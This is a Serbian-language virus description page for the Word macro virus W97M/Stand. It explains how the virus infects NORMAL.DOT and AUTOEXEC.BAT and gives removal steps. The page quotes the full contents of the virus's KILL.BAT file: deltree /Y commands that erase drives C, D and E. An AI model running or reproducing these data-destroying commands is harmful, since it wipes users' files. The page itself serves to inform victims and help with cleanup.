VIRUS INFO
|
| Naziv
virusa: |
W97M/Stand |
| Alias:
|
W97M.Akuma.d |
| Tip: |
makro |
| Način
širenja: |
zaraženim
Wordovim dokumentima |
| Veličina: |
|
Destruktivan:
|
da |
| Datum
aktiviranja: |
po
slučajnom izboru |
| Otkriven:
|
22.05.2000.
|
OBJAŠNJENJE
Kada
se zatvori zaraženi dokument na korisnikovom računaru,
virus izmeni NORMAL.DOT fajl i kreira fajl
C:\ AUTOEXEC.KIL.
Prilikom
svakog otvaranja novog Wordovog dokumenta ili
prilikom otvaranja nekog već postojećeg dokumenta,
biće ispisana
poruka:
Killer Queen kills stupid people like you....
i virus
će pokušati da ugasi Windows.
Fajl
C:\AUTOEXEC.KIL je u stvari sam virusni
kod koji kada detektuje datum koji je slučajno
odabrao, aktivira se i prikaže sledeću
poruku.
Prilikom
pritiskanja dugmeta "Close",
virus, bez znanja korisnika napravi izmene u C:\
AUTOEXEC.BAT kojim se poziva novokreirani
fajl C:\ KILL.BAT.
Sadržaj C:\ KILL.BAT:
deltree
/Y e:\*
deltree /Y d:\*
deltree /Y c:\*
rem Created by The Lonely Mad
rem Hey, looser, now your system, next time I'll
KILL YOU.
Prilikom
sledećeg startovanja računara C:\AUTOEXEC.BAT
će aktivirati fajl C:\KILL.BAT i svi fajlovi
koji postoje na particijama C, D i E će biti izbrisani.
Korisniku, čak neće biti ni ostavljena mogućnost
da na postavljeno pitanja odgovori sa "No."
U virusnom
kodu se primećuje i poruka koja nikada neće biti
ispisana:
Crazy Diamond.
REŠENJE
Obrisati
fajlove C:\ KILL.BAT i C:\ AUTOEXEC.KIL.
U C:\ AUTOEXEC.BAT fajlu treba
obrisati red kojim se poziva C:\ KILL.BAT.
|
